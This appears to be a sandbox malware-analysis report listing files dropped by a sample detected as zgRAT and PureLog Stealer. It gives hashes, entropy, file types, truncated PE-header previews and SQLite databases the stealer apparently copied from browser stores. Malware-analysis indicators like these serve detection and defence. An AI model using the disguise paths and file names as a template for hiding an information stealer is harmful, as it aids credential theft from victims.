                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3680256
                                                                                                                                  Entropy (8bit):7.823453943837237
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:49152:vlztQegrSsUqI0m8MB/KENN6y5AhjJqbLF1FZbEPhE25hCyASkzEQWwZ4IU5/Rri:vly2pM7ENt5adqvzEhtsyAgQWwZWnpI
                                                                                                                                  MD5:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  SHA1:77C3F5F6B13A267C76D5D716FC568F243C5606EE
                                                                                                                                  SHA-256:FE7E66E8973A0886B54BAD8CD02A72B2FC81312DB742AB3E5C56919226D96A69
                                                                                                                                  SHA-512:0863F1B96AA8CAACA8279A983F3143EC943AB1042D4290F53AE3226E61A71C5C3FE5EC56F57B6126F00EAE171D947861796A28533C308A62F6A30EF466896DFA
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\SoftwareDistribution\cmd.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\SoftwareDistribution\cmd.exe, Author: Joe Security
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: VqGD18ELBM.exe, Detection: malicious, Browse
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................. 8.........~>8.. ...@8...@.. ........................8...........@.................................0>8.K....@8.p....................`8...................................................... ............... ..H............text.....8.. ... 8................. ..`.rsrc...p....@8......"8.............@....reloc.......`8......&8.............@..B................`>8.....H..................h........b-..=8......................................0..........(.... ........8........E........N...*.......8....*(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E....................o.......8....~....:.... ....~....{....:....& ....8........~....(I...~....(M... ....<.... ....~....{....9....& ....8t......... ....~....{....:Z...& ....8O...~....(A... .... .... ....s...
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:ASCII text, with very long lines (724), with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):724
                                                                                                                                  Entropy (8bit):5.869322955305929
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:HLKnIfiNjkzShlMoX0ntChUiuI4TctAdQrZqbEqrrg/FWGxIPmLFH:HLKIfToMoknty4TctAddRoxHx
                                                                                                                                  MD5:FA15154E22D9F701F5C32F33540B4B69
                                                                                                                                  SHA1:1D921D7052189DB635DFD213B73F8451A09B10E2
                                                                                                                                  SHA-256:6A4374E018EA624083337A475B5351016A66EF433E2770C93C088A6DE13C6BFF
                                                                                                                                  SHA-512:676B1068B211DA748C067A8DC93519F38CC71C24CABCF801F7F1442E84B3CAC3062B16B22470CB86E01A47C9F905593790C59E69CAC432F6FA9BB01D1D82F718
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:fekEuzLrn4Kk2jCB8SohYvdLDJl7hfvN6zFDa8yDWKrhQTa2dwB18tUuAZBlNNKII7oCd9k9dlLOE64ustdve4OMfVCB7NzI9iYSoYYeLCXXiFpEeQ2etZnOsbgH6jBQvCOfhmFUU9jch1naq7gqUUYk5JkN1QhlAGlg0Jh2LiJuzLr0yGb8DU5anokXB2cEb8baQGjgaofvLovtctZvziiqLL3MjJ0TGFT0tQkrg4iZzJP8215RcqO2avPENX7RxLpFV59LJsO4AI0B54TrOj0Z0aZ8BfdJ7RmneKn71tIucU2R4OISDPDOUQO4fBKnOF6tgMgvQW0eaF7giIDxWKFsOXSO5tb0iegWYIurrXCqZixOSsWX7XQD9OfI3S0h4965jkHZXVF9IZTpkE5NWE2LNcXJnmxZgevZl1psk69mRR5k5zizXnK0HurHN8vuhqdnn3EsYMmZEQ46gwOyD7B3T5R1JifmLOEkyR6BvzbKAvv00vkau7rjojUrmMi0rAOzLTIP0MDOg12iKaAY7E1Nhe5O7OZiQkcAg5phmVkh4dCxrvhLMK2mIASqX4Rlxe76Y1BOvdvmeUTEcIgMqNWGr01gn8JsE8uZfGYzuSZtYQHyrNOOXF4jI0Oi9flxTDigj3iVurcYxnsbsDzat5V9ELRp2zzOrmZVrlPxo3eqmgvfIw06qLDXrjcYm3c41NqKNWtHyBv0apWhZvhG
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:ASCII text, with very long lines (519), with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):519
                                                                                                                                  Entropy (8bit):5.870780278174751
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:/mIs3DSx2UNor/oX2simllyGqqo05rgL/X7RyotohAuODHh:/mDGLqwXFimry8oYSkOh
                                                                                                                                  MD5:17606C9489BCA5DB35BD72E843D365B4
                                                                                                                                  SHA1:DBE1C31A53995A7B80FE202B6E390202911CEC40
                                                                                                                                  SHA-256:CA8678B48134203C704E6C2D74FAEE69642DB4C2A32A78B0A0BE2F1815C12317
                                                                                                                                  SHA-512:664D64771B62A41345B50F94AA15D734EEE6FB87EA6F2DEFC5BC76E779CC6676A2915E78D134368B04362CD4A3C421904517CAFACA53E3F9C545B111C421A76D
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:NMW5ssNbvgZ67y0NhmcDqQx9OMNE2knriLvpIBs3sgGzfbCey3wAmhz6YXqfeIiK3rXwDLEf3iVKK8exJtQ9xmFAVyQvUMZj756xDQamyRGEMowa23Wu2jWQlWaP4TLrIvMOBqt2SnKggByrB02b0orYiqMq0LsfFY5abhYMJdbPZ0ukisNDat1dEypVeDBH4oaHFXPebqSWMc9s6lIH8oFWhbWn1DsGbUUuZmeKdsmubeRmz6Z244JQiEjoBmmY8M42HOTTH7oPCV5CKtx4nzLhKELUD0I1GNvOkYeknGv7P4ONIgdRysuIBXrDC8PQyxIyjqcvPNRhEORQz8MgW1CYcnNMqaho0eIcvZocErCkaNEwFbNEwt47uuV6dPFypmqjFzeaUucoyb7PiaHONd2HkKrADr8ymO5xgfqQ7xtCRPITxGXCI0lMuj85HdWmvnCkgJtDt0QZtz0VBYN7U5pwmtD6gvIeaHQnNhwoWTTRjLc5tn3tQYRz7Q8xGwh7sw8miMI
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3680256
                                                                                                                                  Entropy (8bit):7.823453943837237
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:49152:vlztQegrSsUqI0m8MB/KENN6y5AhjJqbLF1FZbEPhE25hCyASkzEQWwZ4IU5/Rri:vly2pM7ENt5adqvzEhtsyAgQWwZWnpI
                                                                                                                                  MD5:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  SHA1:77C3F5F6B13A267C76D5D716FC568F243C5606EE
                                                                                                                                  SHA-256:FE7E66E8973A0886B54BAD8CD02A72B2FC81312DB742AB3E5C56919226D96A69
                                                                                                                                  SHA-512:0863F1B96AA8CAACA8279A983F3143EC943AB1042D4290F53AE3226E61A71C5C3FE5EC56F57B6126F00EAE171D947861796A28533C308A62F6A30EF466896DFA
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: VqGD18ELBM.exe, Detection: malicious, Browse
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................. 8.........~>8.. ...@8...@.. ........................8...........@.................................0>8.K....@8.p....................`8...................................................... ............... ..H............text.....8.. ... 8................. ..`.rsrc...p....@8......"8.............@....reloc.......`8......&8.............@..B................`>8.....H..................h........b-..=8......................................0..........(.... ........8........E........N...*.......8....*(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E....................o.......8....~....:.... ....~....{....:....& ....8........~....(I...~....(M... ....<.... ....~....{....9....& ....8t......... ....~....{....:Z...& ....8O...~....(A... .... .... ....s...
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:ASCII text, with very long lines (769), with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):769
                                                                                                                                  Entropy (8bit):5.896684655616314
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:i+68uhvnZ/sfi+++6j/tz0OE+kp8GvN+Qul:ixNsvt6znE584N+l
                                                                                                                                  MD5:4ED46F80560AE704223873D560E73B1D
                                                                                                                                  SHA1:9E5C385926114320489CB932C2BF939215AC1AC5
                                                                                                                                  SHA-256:08B3000FAD9F3F2B2398AE49234AB4C6294DD060EF6D2499F107AA8655039736
                                                                                                                                  SHA-512:58333597086DE26E4BD0D907D93A892724D86233A99057198B61D16AD4AAA56BD3AC665B701CBE541BD76A0644A3FD819B36B5A08900D53F087471A0541DD753
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:CtIoZN7CN491VW48oKlLsl7719Z006rydvDQv3GWEl5O1TZEp0up9HCbvKxZxGLQMKXjToNvEPGHptGhkVLALCzWtlekGqi7ZoCr5zuAn9ltA5vCDPzc5LEKVB0rJmoXrIsArZmukLXMaGVxzcg10GCNk1V39D0AUNC1NvVomF1uy2tOqC1rFxhkFeazDsvhUW1MDdkEH2OvOSZsHHN6LJ5hqbvtUfl3UUZcAgLMcxkNivVxEsr6fyVLaUgmr1ulQUa436rk5BdYjs84F8olypYf8OBqAielC96OVa3HAGAdU7mrVlgsNIwl556o5BkWh2VkwujoEglro5KAmTUYCvX4MUSaePM9gn6clC5lC1nqhF6Au5ClqLUvebXbbJKzTlLB9sZkYtWKHqXGXSpiMlTUSK7KodJ2ryX545ACgcN6zJoxDREJdmnsS0syuO54kddTTbMcRnBtYWfJfJGWZAYFKpnDMLRSgSWVqVemFl10k3T5VjSlHjfjEYIoyIPFVtNGAJcKpeRxJieQVrrn2pK7wwQRM0y6Vve1qN5MGI6nRrag31SGbmMqiPTN2K8yqUbXDnkHwfguthpEVuYUirftiySb4rT5JH66QDdQRKT5Gc6BjO1IwnQ8zsyOUINFLkklksySQHCXYjmG1R1pzKJg18HhOO6I7Otg1Va1Zj2ok2kPFsWCRhPBaEumlRECL4aJ0GPg0AQQSe58Y1bf131Z9sFwkyPIezdqcaZ9d0LRR9s6JvNtziLRCAKHBc6Cu
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3680256
                                                                                                                                  Entropy (8bit):7.823453943837237
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:49152:vlztQegrSsUqI0m8MB/KENN6y5AhjJqbLF1FZbEPhE25hCyASkzEQWwZ4IU5/Rri:vly2pM7ENt5adqvzEhtsyAgQWwZWnpI
                                                                                                                                  MD5:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  SHA1:77C3F5F6B13A267C76D5D716FC568F243C5606EE
                                                                                                                                  SHA-256:FE7E66E8973A0886B54BAD8CD02A72B2FC81312DB742AB3E5C56919226D96A69
                                                                                                                                  SHA-512:0863F1B96AA8CAACA8279A983F3143EC943AB1042D4290F53AE3226E61A71C5C3FE5EC56F57B6126F00EAE171D947861796A28533C308A62F6A30EF466896DFA
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................. 8.........~>8.. ...@8...@.. ........................8...........@.................................0>8.K....@8.p....................`8...................................................... ............... ..H............text.....8.. ... 8................. ..`.rsrc...p....@8......"8.............@....reloc.......`8......&8.............@..B................`>8.....H..................h........b-..=8......................................0..........(.... ........8........E........N...*.......8....*(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E....................o.......8....~....:.... ....~....{....:....& ....8........~....(I...~....(M... ....<.... ....~....{....9....& ....8t......... ....~....{....:Z...& ....8O...~....(A... .... .... ....s...
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1915
                                                                                                                                  Entropy (8bit):5.363869398054153
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                                                                                                  MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                                                                                                  SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                                                                                                  SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                                                                                                  SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:CSV text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):847
                                                                                                                                  Entropy (8bit):5.354334472896228
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                                  Process:C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
                                                                                                                                  File Type:CSV text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):847
                                                                                                                                  Entropy (8bit):5.354334472896228
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):20480
                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):40960
                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):106496
                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):49152
                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):20480
                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):126976
                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):40960
                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):159744
                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Fri Jan 3 21:13:36 2025, 1st section name ".debug$S"
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1956
                                                                                                                                  Entropy (8bit):4.549812733316226
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:HhO9/O4mKDfH3YwKG5TYN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:L4mQXKG5syluOulajfqXSfbNtmh1Z
                                                                                                                                  MD5:1656F913E875404359F52FA4AB5418AF
                                                                                                                                  SHA1:EF36C707DA1D454852D028D1DCD3884295CF4A85
